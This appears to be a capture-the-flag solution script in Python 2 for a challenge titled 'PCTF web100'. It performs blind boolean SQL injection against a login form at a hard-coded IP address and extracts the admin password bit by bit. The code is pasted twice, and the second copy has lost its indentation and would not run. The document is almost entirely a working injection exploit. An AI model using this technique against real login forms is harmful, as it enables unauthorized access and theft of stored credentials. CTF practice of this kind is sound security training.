D3AdCa7/PCTF web100

## PCTF web100
import re,json,urllib,urllib2,cookielib
cj = cookielib.CookieJar()
urllib2.install_opener(urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)))

def submit(password,username='blahblah'):
	page = urllib2.urlopen('http://54.204.80.192/example').read()
	action = re.findall(r'action="(.+)" ',page)[0]
	user_field = re.findall(r'input type="text" id="(.+)" name="(.+)"',page)[0][1]
	pass_field = re.findall(r'input type="password" id="(.+)" name="(.+)"',page)[0][1]
	data = {user_field: username, pass_field: password}
	data = urllib.urlencode(data)
	cont = urllib2.urlopen('http://54.204.80.192' + action,data).read()
	return re.findall(r'h4 class="product-header">(.+)</h4>',cont)[0] == 'Hello, admin!! My password is the flag!'

def get_bool( expression ):
	result = submit(" ' or username='admin' and %s = 1 and ''=' " % expression)
	print 'Result:', result
	return result

def get_bit( expression ):
	return '1' if get_bool( expression ) else '0'

from itertools import count

def get_string( expression ):
	result = ''
	for i in count( start=1 ):
		char = ''
		for j in range(8)[::-1]:
			print 'Byte %d, Bit %d,' % (i,j),
			bit = get_bit( 'ascii(substr(%s,%d,1))>>%d&1' % ( expression, i, j ) )
			print bit
			char += bit
		char = int( char, 2 )
		if char == 0: break
		result += chr(char)
		print '----------'
		print result
		print '----------'
	return result

print get_string('password')
	import re,json,urllib,urllib2,cookielib
	cj = cookielib.CookieJar()
	urllib2.install_opener(urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)))

	def submit(password,username='blahblah'):
	page = urllib2.urlopen('http://54.204.80.192/example').read()
	action = re.findall(r'action="(.+)" ',page)[0]
	user_field = re.findall(r'input type="text" id="(.+)" name="(.+)"',page)[0][1]
	pass_field = re.findall(r'input type="password" id="(.+)" name="(.+)"',page)[0][1]
	data = {user_field: username, pass_field: password}
	data = urllib.urlencode(data)
	cont = urllib2.urlopen('http://54.204.80.192' + action,data).read()
	return re.findall(r'h4 class="product-header">(.+)</h4>',cont)[0] == 'Hello, admin!! My password is the flag!'

	def get_bool( expression ):
	result = submit(" ' or username='admin' and %s = 1 and ''=' " % expression)
	print 'Result:', result
	return result

	def get_bit( expression ):
	return '1' if get_bool( expression ) else '0'

	from itertools import count

	def get_string( expression ):
	result = ''
	for i in count( start=1 ):
	char = ''
	for j in range(8)[::-1]:
	print 'Byte %d, Bit %d,' % (i,j),
	bit = get_bit( 'ascii(substr(%s,%d,1))>>%d&1' % ( expression, i, j ) )
	print bit
	char += bit
	char = int( char, 2 )
	if char == 0: break
	result += chr(char)
	print '----------'
	print result
	print '----------'
	return result

	print get_string('password')